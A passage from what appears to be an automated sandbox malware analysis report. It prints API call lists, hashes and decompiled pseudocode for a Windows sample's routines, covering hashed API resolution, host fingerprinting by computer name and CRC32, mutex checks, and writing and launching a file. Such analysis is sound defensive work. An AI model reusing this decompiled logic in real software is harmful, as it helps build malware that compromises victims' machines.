                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 00D1A4C5
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D1A4CC
                                                                                        • _snwprintf.NTDLL ref: 00D1A501
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D1A50D
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D1A514
                                                                                        • CloseHandle.KERNEL32(?), ref: 00D1A536
                                                                                        • CloseHandle.KERNEL32(?), ref: 00D1A53F
                                                                                        • GetTickCount.KERNEL32 ref: 00D1A56B
                                                                                        • _snwprintf.NTDLL ref: 00D1A5BE
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D1A5CA
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D1A5D1
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00D1A5F0
                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D1A608
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D1A60F
                                                                                        • memset.NTDLL ref: 00D1A61D
                                                                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00D1A64A
                                                                                        • CloseHandle.KERNEL32(?), ref: 00D1A657
                                                                                        • CloseHandle.KERNEL32(?), ref: 00D1A660
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D1A669
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D1A670
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$CloseHandle$Process$FileFree$Create_snwprintf$CountTickWrite$ActiveConsoleSessionmemset
                                                                                        • String ID: D
                                                                                        • API String ID: 65010116-2746444292
                                                                                        • Opcode ID: d4efb12690e2286fe187a1ea5443c19b2d33c6ad99421f9acedc2eb63e0361d0
                                                                                        • Instruction ID: 306970f63d64f3fd38408870ce34e2365753bc41d64364c50ace15b0201aef8f
                                                                                        • Opcode Fuzzy Hash: d4efb12690e2286fe187a1ea5443c19b2d33c6ad99421f9acedc2eb63e0361d0
                                                                                        • Instruction Fuzzy Hash: 0F813275990308BFEB109BA4DC49FEA7B7CFB08711F048151FA09E6291DF709A858BB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 91 d19320-d19350 GetModuleFileNameW 93 d19360-d19387 GetProcessHeap RtlAllocateHeap 91->93 94 d19352-d19359 91->94 95 d19389-d1939d call d11790 93->95 96 d1939f 93->96 94->93 97 d193a2-d193b1 lstrlen 95->97 96->97 99 d193b4-d193c5 97->99 101 d193d1-d193d4 99->101 102 d193c7-d193ca 99->102 103 d193d6 101->103 105 d193d7-d193db 101->105 102->103 104 d193cc-d193cf 102->104 103->105 104->101 104->102 106 d193f6-d193fa 105->106 107 d193dd 105->107 106->99 109 d193fc-d1943c GetProcessHeap HeapFree call d11830 106->109 108 d193e0-d193e3 107->108 108->106 110 d193e5-d193f4 108->110 113 d19454-d19463 109->113 114 d1943e-d19452 109->114 110->106 110->108 117 d19468-d194f7 call d11830 _snwprintf GetProcessHeap HeapFree _snwprintf GetProcessHeap HeapFree CreateFileW 113->117 114->117 120 d19552-d1956a GetComputerNameW 117->120 121 d194f9-d1950e CreateFileMappingW 117->121 124 d19570-d19578 120->124 125 d1960b-d19610 120->125 122 d19510-d19523 MapViewOfFile 121->122 123 d1954b-d1954c CloseHandle 121->123 126 d19525-d1953e GetFileSize RtlComputeCrc32 UnmapViewOfFile 122->126 127 d19544-d19545 CloseHandle 122->127 123->120 128 d1957a-d1957f 124->128 129 d195ad-d195c2 GetProcessHeap RtlAllocateHeap 124->129 126->127 127->123 130 d19580-d19586 128->130 131 d195c4-d195d8 call d11790 129->131 132 d195da 129->132 133 d19588-d1958b 130->133 134 d1958d-d19590 130->134 136 d195dd-d19605 _snprintf GetProcessHeap HeapFree 131->136 132->136 133->134 137 d195a4-d195ab 133->137 138 d19592-d19595 134->138 139 d19597-d1959a 134->139 136->125 137->129 137->130 138->137 138->139 141 d195a1 139->141 142 d1959c-d1959f 139->142 141->137 142->137 142->141
                                                                                        C-Code - Quality: 64%
                                                                                        			E00D19320(void* __ecx) {
                                                                                        				void* _v8;
                                                                                        				long _v12;
                                                                                        				short _v44;
                                                                                        				intOrPtr _t25;
                                                                                        				void* _t27;
                                                                                        				void* _t28;
                                                                                        				signed int _t32;
                                                                                        				char* _t35;
                                                                                        				int _t53;
                                                                                        				signed int _t60;
                                                                                        				void* _t71;
                                                                                        				long _t72;
                                                                                        				void* _t74;
                                                                                        				void* _t75;
                                                                                        				signed int _t76;
                                                                                        				char _t77;
                                                                                        				void* _t79;
                                                                                        				signed short* _t80;
                                                                                        				long _t87;
                                                                                        				void* _t92;
                                                                                        				void* _t94;
                                                                                        				short* _t96;
                                                                                        				void* _t97;
                                                                                        				void* _t98;
                                                                                        				void* _t99;
                                                                                        				void* _t101;
                                                                                        				void* _t102;
                                                                                        				void* _t103;
                                                                                        				void* _t104;
                                                                                        				void* _t106;
                                                                                        
                                                                                        				_t75 = __ecx;
                                                                                        				_t25 =  *0xd1c27c; // 0x0
                                                                                        				_t103 = _t102 - 0x28;
                                                                                        				 *0xd1c3ac = _t25;
                                                                                        				GetModuleFileNameW(0, 0xd1c9c8, 0x104);
                                                                                        				_t27 =  *0xd1c040(0, 0, 6);
                                                                                        				if(_t27 != 0) {
                                                                                        					 *0xd1c2a4 =  *0xd1c2a4 | 0x00000001;
                                                                                        					 *0xd1c0a8(_t27);
                                                                                        				}
                                                                                        				_t28 =  *0xd1c3ac; // 0x0
                                                                                        				_t96 = 0xd1c3b0;
                                                                                        				_v8 = _t28;
                                                                                        				_t92 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
                                                                                        				if(_t92 == 0) {
                                                                                        					_t92 = _v12;
                                                                                        				} else {
                                                                                        					_push(_t75);
                                                                                        					E00D11790(0xd113d0, 0x158, _t92);
                                                                                        					_t103 = _t103 + 8;
                                                                                        				}
                                                                                        				_t76 =  *0xd1c1e4(_t92, _t71);
                                                                                        				_t72 = 2;
                                                                                        				_v12 = _t76;
                                                                                        				do {
                                                                                        					_t32 = _v8;
                                                                                        					_v8 =  !(_t32 / _t76);
                                                                                        					_t35 = _t92 + _t32 % _t76;
                                                                                        					if(_t35 <= _t92) {
                                                                                        						L9:
                                                                                        						if( *_t35 != 0x2c) {
                                                                                        							L11:
                                                                                        							_t77 =  *_t35;
                                                                                        							if(_t77 == 0) {
                                                                                        								goto L15;
                                                                                        							}
                                                                                        							while(_t77 != 0x2c) {
                                                                                        								_t35 = _t35 + 1;
                                                                                        								 *_t96 = _t77;
                                                                                        								_t96 = _t96 + 2;
                                                                                        								_t77 =  *_t35;
                                                                                        								if(_t77 != 0) {
                                                                                        									continue;
                                                                                        								}
                                                                                        								goto L15;
                                                                                        							}
                                                                                        							goto L15;
                                                                                        						}
                                                                                        						L10:
                                                                                        						_t35 = _t35 + 1;
                                                                                        						goto L11;
                                                                                        					}
                                                                                        					while( *_t35 != 0x2c) {
                                                                                        						_t35 = _t35 - 1;
                                                                                        						if(_t35 > _t92) {
                                                                                        							continue;
                                                                                        						}
                                                                                        						goto L9;
                                                                                        					}
                                                                                        					goto L10;
                                                                                        					L15:
                                                                                        					_t76 = _v12;
                                                                                        					_t72 = _t72 - 1;
                                                                                        				} while (_t72 != 0);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t92);
                                                                                        				 *_t96 = 0;
                                                                                        				E00D11830(0xd11384, 0xc, 0x7d1cc189,  &_v12);
                                                                                        				_t104 = _t103 + 8;
                                                                                        				_push(0xd1c5b8);
                                                                                        				_push(0);
                                                                                        				_push(0);
                                                                                        				if(( *0xd1c2a4 & 0x00000001) == 0) {
                                                                                        					 *0xd1c214(0, 0x1c);
                                                                                        					_t87 = 0x14;
                                                                                        					_t79 = 0xd11530;
                                                                                        				} else {
                                                                                        					 *0xd1c214(0, 0x29);
                                                                                        					_t87 = 4;
                                                                                        					_t79 = 0xd11380;
                                                                                        				}
                                                                                        				E00D11830(_t79, _t87, 0x7d1cc189,  &_v8);
                                                                                        				_t97 = _v8;
                                                                                        				 *0xd1c200(0xd1c5b8, 0x104, _t97, 0xd1c5b8, 0xd1c3b0);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t97);
                                                                                        				_t98 = _v12;
                                                                                        				 *0xd1c200(0xd1c7c0, 0x104, _t98, 0xd1c5b8, 0xd1c3b0);
                                                                                        				_t106 = _t104 + 0x30;
                                                                                        				HeapFree(GetProcessHeap(), 0, _t98);
                                                                                        				_t99 = CreateFileW(0xd1c9c8, 0x80000000, 1, 0, 3, 0, 0);
                                                                                        				if(_t99 != 0xffffffff) {
                                                                                        					_t94 = CreateFileMappingW(_t99, 0, 2, 0, 0, 0);
                                                                                        					if(_t94 != 0) {
                                                                                        						_t74 = MapViewOfFile(_t94, 4, 0, 0, 0);
                                                                                        						if(_t74 != 0) {
                                                                                        							 *0xd1cbd0 = RtlComputeCrc32(0, _t74, GetFileSize(_t99, 0));
                                                                                        							UnmapViewOfFile(_t74);
                                                                                        						}
                                                                                        						CloseHandle(_t94);
                                                                                        					}
                                                                                        					CloseHandle(_t99);
                                                                                        				}
                                                                                        				_v12 = 0x10;
                                                                                        				_t53 = GetComputerNameW( &_v44,  &_v12);
                                                                                        				if(_t53 == 0) {
                                                                                        					L40:
                                                                                        					return _t53;
                                                                                        				} else {
                                                                                        					_t80 =  &_v44;
                                                                                        					if(_v44 == 0) {
                                                                                        						L36:
                                                                                        						_t101 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
                                                                                        						if(_t101 == 0) {
                                                                                        							_t101 = _v12;
                                                                                        						} else {
                                                                                        							_push(_t80);
                                                                                        							E00D11790(0xd11390, 8, _t101);
                                                                                        							_t106 = _t106 + 8;
                                                                                        						}
                                                                                        						 *0xd1c210(0xd1c2a8, 0x104, _t101,  &_v44,  *0xd1c3ac);
                                                                                        						_t53 = HeapFree(GetProcessHeap(), 0, _t101);
                                                                                        						goto L40;
                                                                                        					}
                                                                                        					do {
                                                                                        						_t60 =  *_t80 & 0x0000ffff;
                                                                                        						if(_t60 < 0x30 || _t60 > 0x39) {
                                                                                        							if(_t60 < 0x61 || _t60 > 0x7a) {
                                                                                        								if(_t60 < 0x41 || _t60 > 0x5a) {
                                                                                        									 *_t80 = 0x58;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						_t80 =  &(_t80[1]);
                                                                                        					} while ( *_t80 != 0);
                                                                                        					goto L36;
                                                                                        				}
                                                                                        			}

































                                                                                        0x00d19320
                                                                                        0x00d19323
                                                                                        0x00d19328
                                                                                        0x00d1932b
                                                                                        0x00d1933c
                                                                                        0x00d19348
                                                                                        0x00d19350
                                                                                        0x00d19352
                                                                                        0x00d1935a
                                                                                        0x00d1935a
                                                                                        0x00d19360
                                                                                        0x00d1936e
                                                                                        0x00d19373
                                                                                        0x00d19383
                                                                                        0x00d19387
                                                                                        0x00d1939f
                                                                                        0x00d19389
                                                                                        0x00d19389
                                                                                        0x00d19395
                                                                                        0x00d1939a
                                                                                        0x00d1939a
                                                                                        0x00d193aa
                                                                                        0x00d193ac
                                                                                        0x00d193b1
                                                                                        0x00d193b4
                                                                                        0x00d193b4
                                                                                        0x00d193bd
                                                                                        0x00d193c0
                                                                                        0x00d193c5
                                                                                        0x00d193d1
                                                                                        0x00d193d4
                                                                                        0x00d193d7
                                                                                        0x00d193d7
                                                                                        0x00d193db
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d193e0
                                                                                        0x00d193e9
                                                                                        0x00d193ea
                                                                                        0x00d193ed
                                                                                        0x00d193f0
                                                                                        0x00d193f4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d193f4
                                                                                        0x00000000
                                                                                        0x00d193e0
                                                                                        0x00d193d6
                                                                                        0x00d193d6
                                                                                        0x00000000
                                                                                        0x00d193d6
                                                                                        0x00d193c7
                                                                                        0x00d193cc
                                                                                        0x00d193cf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00d193cf
                                                                                        0x00000000
                                                                                        0x00d193f6
                                                                                        0x00d193f6
                                                                                        0x00d193f9
                                                                                        0x00d193f9
                                                                                        0x00d19406
                                                                                        0x00d19413
                                                                                        0x00d19424
                                                                                        0x00d19429
                                                                                        0x00d19433
                                                                                        0x00d19438
                                                                                        0x00d1943a
                                                                                        0x00d1943c
                                                                                        0x00d19458
                                                                                        0x00d1945e
                                                                                        0x00d19463
                                                                                        0x00d1943e
                                                                                        0x00d19442
                                                                                        0x00d19448
                                                                                        0x00d1944d
                                                                                        0x00d1944d
                                                                                        0x00d19471
                                                                                        0x00d19476
                                                                                        0x00d1948e
                                                                                        0x00d194a1
                                                                                        0x00d194a7
                                                                                        0x00d194bf
                                                                                        0x00d194c5
                                                                                        0x00d194d2
                                                                                        0x00d194f2
                                                                                        0x00d194f7
                                                                                        0x00d1950a
                                                                                        0x00d1950e
                                                                                        0x00d1951f
                                                                                        0x00d19523
                                                                                        0x00d19539
                                                                                        0x00d1953e
                                                                                        0x00d1953e
                                                                                        0x00d19545
                                                                                        0x00d19545
                                                                                        0x00d1954c
                                                                                        0x00d1954c
                                                                                        0x00d19555
                                                                                        0x00d19561
                                                                                        0x00d1956a
                                                                                        0x00d1960b
                                                                                        0x00d19610
                                                                                        0x00d19570
                                                                                        0x00d19575
                                                                                        0x00d19578
                                                                                        0x00d195ad
                                                                                        0x00d195be
                                                                                        0x00d195c2
                                                                                        0x00d195da
                                                                                        0x00d195c4
                                                                                        0x00d195c4
                                                                                        0x00d195d0
                                                                                        0x00d195d5
                                                                                        0x00d195d5
                                                                                        0x00d195f2
                                                                                        0x00d19605
                                                                                        0x00000000
                                                                                        0x00d19605
                                                                                        0x00d19580
                                                                                        0x00d19580
                                                                                        0x00d19586
                                                                                        0x00d19590
                                                                                        0x00d1959a
                                                                                        0x00d195a1
                                                                                        0x00d195a1
                                                                                        0x00d1959a
                                                                                        0x00d19590
                                                                                        0x00d195a4
                                                                                        0x00d195a7
                                                                                        0x00000000
                                                                                        0x00d19580

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00D1C9C8,00000104,?,?,?,?,?,?,?,?,?,00D19310), ref: 00D1933C
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000015C,00000000,00D116C0,?,?,?,?,?,?,?,?,?,00D19310), ref: 00D19376
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D1937D
                                                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00D19310), ref: 00D193A4
                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00D19310), ref: 00D193FF
                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00D19310), ref: 00D19406
                                                                                        • _snwprintf.NTDLL ref: 00D1948E
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D19310), ref: 00D1949A
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D194A1
                                                                                        • _snwprintf.NTDLL ref: 00D194BF
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00D194CB
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D194D2
                                                                                        • CreateFileW.KERNEL32(00D1C9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D194EC
                                                                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D19504
                                                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00D19519
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00D19528
                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00D19532
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00D1953E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D19545
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00D1954C
                                                                                        • GetComputerNameW.KERNEL32(?,?), ref: 00D19561
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00D195B1
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00D195B8
                                                                                        • _snprintf.NTDLL ref: 00D195F2
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000010), ref: 00D195FE
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19605
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FileProcess$Free$AllocateCloseCreateHandleNameView_snwprintf$ComputeComputerCrc32MappingModuleSizeUnmap_snprintflstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 968319538-0
                                                                                        • Opcode ID: f0fd0e1b66fdc962fc0f899855c0f0673e2bbef17dd2ce38e7df9d3eac4ddf18
                                                                                        • Instruction ID: 500e7af0bf3b57ccd0b7187922aeb9377e63c39c507dfe1cc5eb269c9f2bc4cf
                                                                                        • Opcode Fuzzy Hash: f0fd0e1b66fdc962fc0f899855c0f0673e2bbef17dd2ce38e7df9d3eac4ddf18
                                                                                        • Instruction Fuzzy Hash: 0D81E4706E0300BFFB115BA4AC29FDABB69EB05B01F189015FA05EA3D1DEB089C18775
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 96%
                                                                                        			E00D19C50(void* __ecx) {
                                                                                        				void* _v8;
                                                                                        				void* _t100;
                                                                                        				void* _t101;
                                                                                        				void* _t102;
                                                                                        				void* _t103;
                                                                                        				void* _t104;
                                                                                        				void* _t105;
                                                                                        				void* _t106;
                                                                                        				void* _t107;
                                                                                        
                                                                                        				_push(__ecx);
                                                                                        				E00D11830(0xd1155c, 0xc, 0x4a604ebc,  &_v8);
                                                                                        				_t100 = _v8;
                                                                                        				E00D11B10(LoadLibraryW(_t100), 0xd11040, 0x21, 0x54b7e774, 0xd1c040);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t100);
                                                                                        				E00D11830(0xd11568, 0xc, 0x4a604ebc,  &_v8);
                                                                                        				_t101 = _v8;
                                                                                        				E00D11B10(LoadLibraryW(_t101), 0xd11024, 1, 0x3c505b91, 0xd1c0c8);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t101);
                                                                                        				E00D11830(0xd11574, 0xc, 0x4a604ebc,  &_v8);
                                                                                        				_t102 = _v8;
                                                                                        				E00D11B10(LoadLibraryW(_t102), 0xd11028, 2, 0x10577008, 0xd1c214);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t102);
                                                                                        				E00D11830(0xd11580, 0xc, 0x4a604ebc,  &_v8);
                                                                                        				_t103 = _v8;
                                                                                        				E00D11B10(LoadLibraryW(_t103), 0xd1100c, 1, 0x7194b56b, 0xd1c0c4);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t103);
                                                                                        				E00D11830(0xd11550, 0xc, 0x4a604ebc,  &_v8);
                                                                                        				_t104 = _v8;
                                                                                        				E00D11B10(LoadLibraryW(_t104), 0xd110c4, 1, 0x20edec96, 0xd1c0cc);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t104);
                                                                                        				E00D11830(0xd11544, 0xc, 0x4a604ebc,  &_v8);
                                                                                        				_t105 = _v8;
                                                                                        				E00D11B10(LoadLibraryW(_t105), 0xd110c8, 2, 0x620cb38e, 0xd1c21c);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t105);
                                                                                        				E00D11830(0xd11598, 0xc, 0x4a604ebc,  &_v8);
                                                                                        				_t106 = _v8;
                                                                                        				E00D11B10(LoadLibraryW(_t106), 0xd11220, 0xe, 0x5a7185ae, 0xd1c230);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t106);
                                                                                        				E00D11830(0xd1158c, 0xc, 0x4a604ebc,  &_v8);
                                                                                        				_t107 = _v8;
                                                                                        				E00D11B10(LoadLibraryW(_t107), 0xd11214, 3, 0x73ee0ad8, 0xd1c224);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t107);
                                                                                        				return E00D192A0(_t61);
                                                                                        			}












                                                                                        0x00d19c53
                                                                                        0x00d19c68
                                                                                        0x00d19c6d
                                                                                        0x00d19c8d
                                                                                        0x00d19c9f
                                                                                        0x00d19cb8
                                                                                        0x00d19cbd
                                                                                        0x00d19cdd
                                                                                        0x00d19cef
                                                                                        0x00d19d08
                                                                                        0x00d19d0d
                                                                                        0x00d19d2d
                                                                                        0x00d19d3f
                                                                                        0x00d19d58
                                                                                        0x00d19d5d
                                                                                        0x00d19d7d
                                                                                        0x00d19d8f
                                                                                        0x00d19da8
                                                                                        0x00d19dad
                                                                                        0x00d19dcd
                                                                                        0x00d19ddf
                                                                                        0x00d19df8
                                                                                        0x00d19dfd
                                                                                        0x00d19e1d
                                                                                        0x00d19e2f
                                                                                        0x00d19e48
                                                                                        0x00d19e4d
                                                                                        0x00d19e6d
                                                                                        0x00d19e7f
                                                                                        0x00d19e98
                                                                                        0x00d19ea0
                                                                                        0x00d19ebd
                                                                                        0x00d19ecf
                                                                                        0x00d19ede

                                                                                        APIs
                                                                                          • Part of subcall function 00D11830: GetProcessHeap.KERNEL32(00000008,00D19F6B,00000000,00000000,00D11004,?,00D115F4,4DBAC13F,00D19F6B,?,00000000), ref: 00D11844
                                                                                          • Part of subcall function 00D11830: RtlAllocateHeap.NTDLL(00000000,?,00D115F4), ref: 00D1184B
                                                                                        • LoadLibraryW.KERNEL32(00D116C0,?,00D116C0), ref: 00D19C74
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D116C0,?,?,?,?,00D116C0), ref: 00D19C98
                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00D116C0), ref: 00D19C9F
                                                                                        • LoadLibraryW.KERNEL32(00D116C0,?,?,?,?,?,?,00D116C0), ref: 00D19CC4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D116C0,?,?,?,?,?,?,?,?,?,00D116C0), ref: 00D19CE8
                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00D116C0), ref: 00D19CEF
                                                                                        • LoadLibraryW.KERNEL32(00D116C0,?,?,?,?,?,?,?,?,?,?,?,00D116C0), ref: 00D19D14
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D116C0), ref: 00D19D38
                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D116C0), ref: 00D19D3F
                                                                                        • LoadLibraryW.KERNEL32(00D116C0), ref: 00D19D64
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D116C0), ref: 00D19D88
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19D8F
                                                                                        • LoadLibraryW.KERNEL32(00D116C0), ref: 00D19DB4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D116C0), ref: 00D19DD8
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19DDF
                                                                                        • LoadLibraryW.KERNEL32(00D116C0), ref: 00D19E04
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D116C0), ref: 00D19E28
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19E2F
                                                                                        • LoadLibraryW.KERNEL32(00D116C0), ref: 00D19E54
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D116C0), ref: 00D19E78
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19E7F
                                                                                        • LoadLibraryW.KERNEL32(00D116C0), ref: 00D19EA4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00D116C0), ref: 00D19EC8
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00D19ECF
                                                                                          • Part of subcall function 00D192A0: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00D192B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.196824116.0000000000D11000.00000020.00020000.sdmp, Offset: 00D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.196819606.0000000000D10000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196835486.0000000000D1B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196839575.0000000000D1C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.196843485.0000000000D1D000.00000002.00020000.sdmp Download File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d10000_9fdUNaHzLv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$FreeLibraryLoad$AllocateDirectoryWindows
                                                                                        • String ID:
                                                                                        • API String ID: 357832750-0
                                                                                        • Opcode ID: 06c1ec582776ced1096e77842cd5ea401171b7612f0261e17d1bea4f7cfe5e06
                                                                                        • Instruction ID: 6b8168cb198fe15a62780697ce89c257c0fd25f97dc2cf0f9eb46958a942466a
                                                                                        • Opcode Fuzzy Hash: 06c1ec582776ced1096e77842cd5ea401171b7612f0261e17d1bea4f7cfe5e06
                                                                                        • Instruction Fuzzy Hash: 0A514E65AD4304BBEB0067A0BC1AFDB3A69DB45306F105024FA05E7383DE359AC68BB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        C-Code - Quality: 48%
                                                                                        			E00D19060(void* __eflags) {
                                                                                        				void* _v8;
                                                                                        				char _v12;
                                                                                        				short _v140;
                                                                                        				short _v268;
                                                                                        				short _v396;
                                                                                        				long _t31;
                                                                                        				void* _t45;
                                                                                        				void* _t47;
                                                                                        				long _t50;
                                                                                        				long _t57;
                                                                                        				int _t59;
                                                                                        				signed int _t60;
                                                                                        				void* _t66;
                                                                                        				void* _t67;
                                                                                        				void* _t68;
                                                                                        				void* _t69;
                                                                                        
                                                                                        				_t59 = 0;
                                                                                        				memset(0xd1c284, 0, 0x18);
                                                                                        				_t60 = 0xd11364;
                                                                                        				_t2 = _t59 + 0xc; // 0xc
                                                                                        				E00D11830(0xd11364, _t2, 0x4a604ebc,  &_v8);
                                                                                        				_t67 = _v8;
                                                                                        				 *0xd1c200( &_v140, 0x40, _t67,  *0xd1c27c);
                                                                                        				HeapFree(GetProcessHeap(), 0, _t67);
                                                                                        				_t66 = CreateMutexW(0, 0,  &_v140);
                                                                                        				if(_t66 == 0) {
                                                                                        					L12:
                                                                                        					 *0xd1c0b8( *0xd1c288);
                                                                                        					 *0xd1c064( *0xd1c28c);
                                                                                        					 *0xd1c064( *0xd1c290);
                                                                                        					 *0xd1c08c( *0xd1c284, 0);
                                                                                        					E00D18AA0();
                                                                                        					return E00D1A750(_t60 | 0xffffffff);
                                                                                        				}
                                                                                        				_t31 = WaitForSingleObject(_t66, 0);
                                                                                        				if(_t31 == 0 || _t31 == 0x80) {
                                                                                        					E00D11830(0xd11258, 0xc, 0x4a604ebc,  &_v8);
                                                                                        					_t68 = _v8;
                                                                                        					 *0xd1c200( &_v396, 0x40, _t68,  *0xd1c27c);
                                                                                        					HeapFree(GetProcessHeap(), 0, _t68);
                                                                                        					_t60 = 0xd11264;
                                                                                        					E00D11830(0xd11264, 0xc, 0x4a604ebc,  &_v8);
                                                                                        					_t69 = _v8;
                                                                                        					 *0xd1c200( &_v268, 0x40, _t69,  *0xd1c27c);
                                                                                        					HeapFree(GetProcessHeap(), 0, _t69);
                                                                                        					_t45 = CreateMutexW(0, 0,  &_v268);
                                                                                        					 *0xd1c2a0 = _t45;
                                                                                        					if(_t45 == 0) {
                                                                                        						goto L12;
                                                                                        					}
                                                                                        					_t47 = CreateEventW(0, 0, 0,  &_v396);
                                                                                        					 *0xd1c29c = _t47;
                                                                                        					if(_t47 != 0) {
                                                                                        						_t57 = SignalObjectAndWait(_t47,  *0xd1c2a0, 0xffffffff, 0);
                                                                                        						if(_t57 == 0 || _t57 == 0x80) {
                                                                                        							_t59 = ResetEvent( *0xd1c29c);
                                                                                        						}
                                                                                        					}
                                                                                        					ReleaseMutex(_t66);
                                                                                        					CloseHandle(_t66);
                                                                                        					if(_t59 != 0) {
                                                                                        						_t50 = GetTickCount();
                                                                                        						_push(0x10);
                                                                                        						_push(0x3e8);
                                                                                        						_push(0x3e8);
                                                                                        						_push(0);
                                                                                        						 *0xd1c280 = 1;
